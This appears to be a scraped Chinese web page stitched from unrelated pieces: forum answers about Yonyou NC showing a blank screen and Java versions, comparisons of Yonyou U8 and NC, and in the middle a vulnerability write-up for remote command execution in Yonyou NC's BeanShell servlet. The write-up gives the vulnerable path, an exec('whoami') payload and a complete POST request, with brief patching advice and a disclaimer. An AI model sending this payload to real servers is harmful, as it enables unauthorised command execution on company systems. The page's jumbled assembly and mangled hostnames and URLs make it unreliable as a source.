用友NC打开后空白,设置IE、重装java,什么办法都试了,都没用,求大神
目前java已经更新到很新的,NC5产品基于的java是比较早的版本,请注意不要更新java版本,在java设置里面可以设置不更新,默认是自动更新。
问题解决方式:
1、卸载本机所有的java,通过360等软件彻底清除java残留后,重启电脑,直接打开浏览器登录地址,系统会自动提示下载java,该java是通过NC服务器上下载的,默认比较匹配的版本。
2、通过同事、网站、用友运维等途径,获取一个比较早的java版本,一般都会有留存。
3、通过下载服务器的客户端,安装客户端后,登录软件不会出现该问题。
3、通过用友体系,获取一个NC65版本软件的uclient,该插件是目前实施顾问比较喜欢的。该插件可以完美兼容多个不同版本的服务器登录(直接下载对应网址的服务器java)。
X友 NC 远程命令执行
一、漏洞简介
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。
用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bshservletBshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)
二、漏洞影响
用友NC 全版本
三、漏洞复现
主页样式
漏洞url:
/servlet/~ic/bshservletBshServlet
访问执行:
exec("whoami");
详细数据包:
POST /servlet/~ic/bshservletBshServlet
host: 127001:8080
user-agent: Mozilla/50 (Windows; U; Windows NT 61; en-US) AppleWebKit/5343 (KHTML, like Gecko) Chrome/6047233 Safari/5343 SE 2X MetaSr 10
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
bshscript=exec("whoami");
简单批量一下
四、修复建议
1、用友NC为商业软件,可直接联系用友官方获得安全升级方案。
2、在官方安全补丁发布之前,建议相关企业严格限制用友NC的访问权限,禁止外部IP请求用友NC应用。
参考:
https://blogcsdnnet/weixin_45728976/article/details/106560286
http://wikipeiqitech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ehtmlh=%E7%94%A8%E5%8F%8B%20NC%20bshservletBshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
往期用友漏洞:
用友GRP-u8 注入-RCE漏洞复现
注意:⚠️
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
用友U8系列,使用局域网,服务器视并发访问数量选择,一般几十个人并发的,选择很普通的服务器就行,一般采用微软server版操作系统,客户端安装软件,要求也是windows系统,对版本要求不高
用友NC系列,基于互联网,服务器建议采用小型机,数据库一般是orical,客户端因为使用浏览器访问,对操作系统没有严格要求
至于你说的域管理,是方便局域网管理的一种模式,因为ERP系统采用用户口令方式登录,对管理模式没有要求。
用友NC是用友公司开发的最新的财务软件,是U8的下一代产品,适用于大中型集团公司的财务核算,我们公司就在用,比U8的功能强大许多,也繁琐了不少,不过用习惯了,还是很不错的,不过很贵啊,连服务器带软件下来要4-5百万。
0条评论